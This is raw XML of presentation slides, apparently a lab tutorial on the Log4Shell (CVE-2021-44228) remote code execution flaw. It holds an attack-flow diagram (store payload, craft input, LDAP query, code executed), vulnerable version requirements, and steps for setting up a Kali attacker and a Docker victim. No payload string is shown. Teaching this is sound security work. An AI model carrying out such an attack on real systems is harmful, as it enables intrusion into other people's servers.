              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9072A050-BB75-3452-CF8E-D395C4BFB7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2760" y="5446661"/>
            <a:ext cx="492271" cy="4922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C04EBD3-DDF5-BEDC-7B70-A5528F60A0F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1722491" y="3757708"/>
            <a:ext cx="2618730" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>1. store malicious payload</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="TextBox 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B39B77C2-31E8-07D6-EF84-921A601D466E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4048810" y="2831584"/>
            <a:ext cx="1390445" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>2. craft input</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="TextBox 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6843102A-F51B-CAD4-C30E-44740071002F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4279906" y="4800447"/>
            <a:ext cx="4502195" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>3. input query LDAP resource (malicious code)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="TextBox 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB1C8965-531B-ADFA-9F90-55EB18750511}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4422327" y="5202444"/>
            <a:ext cx="4416787" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>4. malicious code was sent to the Web server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="TextBox 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93A18B92-965A-6F03-FBAB-1D92989E135F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8839114" y="3571924"/>
            <a:ext cx="2172503" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>5. malicious code was executed</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3231220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erver Icon Vector Sign and Symbol Isolated on White Background Stock  Vector - Illustration of symbol, global: 133803763">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BBBF8A1F-2206-743F-2A8B-A95AB86D22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30" t="15124" r="13765" b="14963"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6948408" y="3082384"/>
            <a:ext cx="1767368" cy="16925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server Vector Icons free download in SVG, PNG Format">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBC0B58A-19E6-8814-CA04-193AAF8723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24" t="4655" r="7546" b="9761"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2451400" y="4632822"/>
            <a:ext cx="1650087" cy="1715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774299-AC49-52F1-E83A-1F79B84E9282}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Software and version requirements</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1032" name="Picture 8" descr="Attacker Images – Browse 81,381 Stock Photos, Vectors, and Video | Adobe  Stock">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E90D55ED-B80E-4F88-076A-CD6F66AAA5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91" t="12696" r="20402" b="12411"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2573512" y="1879412"/>
            <a:ext cx="1333494" cy="16925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99A620-6D40-B018-CE88-653DB6F23F7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7265099" y="4263181"/>
            <a:ext cx="987947" cy="397778"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11E367CF-7107-13D6-FDCC-D0C5D9840F77}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2145742" y="1367522"/>
            <a:ext cx="2276585" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>136.160.215.12/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>127.0.0.1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1CB4FA0-B208-9539-4873-03F55A00E471}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2117259" y="4406000"/>
            <a:ext cx="2137124" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>136.160.215.13</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1028" name="Picture 4" descr="Linux - Wikipedia">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B840082-2704-503A-456D-002C6BA66E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785134" y="1442482"/>
            <a:ext cx="440155" cy="5215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2B9FA8C6-8E9A-B4F8-F741-A8EA8535E5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4694" y="4426566"/>
            <a:ext cx="517837" cy="4569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ux - Wikipedia">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49CF214E-4F73-9779-1164-B3E1981EA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129713" y="3466246"/>
            <a:ext cx="440155" cy="5215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ocker - Crunchbase Company Profile &amp; Funding">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FF93EB4-E8A6-64F9-C572-6AD42B8CBB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05031" y="4061548"/>
            <a:ext cx="723755" cy="619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LDAP, JXplorer and Java - An introductory LDAP tutorial - Symbiotics">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{578ACCB4-1AA9-1EDA-AD08-206C0C629A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9819" y="4947525"/>
            <a:ext cx="715582" cy="7155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FDD7FE6-6421-A661-935C-5AF6F52C617C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6809344" y="2248409"/>
            <a:ext cx="2172503" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Web Server: vulnerable-app</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1040" name="Picture 16" descr="Payload - Free security icons">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51C4556D-4237-DD70-EED8-E6B60D2824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264" y="5650446"/>
            <a:ext cx="492271" cy="49227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C6D96C4E-08D3-214C-437D-EBC03326DE9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1032" idx="2"/>
            <a:endCxn id="5" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3185821" y="3571924"/>
            <a:ext cx="54438" cy="83407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85CEB8-D50C-CCD1-1786-25B00DFE0FCB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4254498" y="2758842"/>
            <a:ext cx="1738185" cy="77204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CCF361-6E38-594D-1C73-A4EE72C8F79D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4124270" y="4680804"/>
            <a:ext cx="1865883" cy="81310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62B978-9EDC-1B23-3786-94547B474061}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4422327" y="5049700"/>
            <a:ext cx="1707386" cy="79205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436D9B-9245-96A2-5272-A7C0E6C39DDC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="902965" y="5445728"/>
            <a:ext cx="1587294" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>JDK 1.8_202 or</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>JDK 1.8_181</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A934CF6-CA5D-C49A-1528-F653C3434E21}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6885353" y="4764190"/>
            <a:ext cx="3259016" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Log4j 2.14.1 (through spring-boot-starter-log4j2 2.6.1)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4064362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0054-B7A4-7B0B-7CB2-1E48514EE7D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>1. Set up an attack machine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC475928-A100-3D22-F805-72F3F96DB982}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>We use Kali 2021.04 and make sure you follow the installation instructions provided by https://github.com/frankwxu/digital-forensics-lab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3905108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0054-B7A4-7B0B-7CB2-1E48514EE7D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>2. Set up a victim machine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC475928-A100-3D22-F805-72F3F96DB982}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>We will create a Docker container on top of Kali</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="406243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is Log4Shell vulnerability?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>The Log4Shell vulnerability is a critical security flaw</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Remote Code Execution (RCE) vulnerability in the Apache Log4j library.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>allows remote attackers to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>execute arbitrary code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>on a target system where the vulnerable version of Log4j is used.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>It was discovered in December 2021.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>known as CVE-2021-44228.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Attackers could exploit Log4Shell vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Take control of affected systems, steal data, or carry out other malicious activities.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>The Log4Shell attack can have severe consequences</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>affects a widely used Log4j library in Java-based applications.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="220157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8A943-8724-82F4-1ABD-6690497F20BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1499552" y="1314410"/>
            <a:ext cx="8182928" cy="2758864"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67C87EFE-F19B-2204-8E2E-82A87598BECC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1499552" y="4738329"/>
            <a:ext cx="8182928" cy="1017695"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CED34D2E-3EB7-CBCA-3F91-B49B48B6B4C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1499552" y="867508"/>
            <a:ext cx="1631601" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>docker</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="112061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752F05-E1AB-748F-21A6-FD9C60257DEE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="865990" y="558800"/>
            <a:ext cx="10744499" cy="62992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0006D81-3BE6-2249-F5F6-B820B45F8D28}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="6768692" y="655704"/>
              <a:ext cx="736560" cy="603360"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="2" name="Ink 1">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30006D81-3BE6-2249-F5F6-B820B45F8D28}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId5"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="6732692" y="619704"/>
                <a:ext cx="80820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947B827-B9F8-B114-E223-17A0BEBC3402}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="5706692" y="3438144"/>
              <a:ext cx="360" cy="360"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="4" name="Ink 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E947B827-B9F8-B114-E223-17A0BEBC3402}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
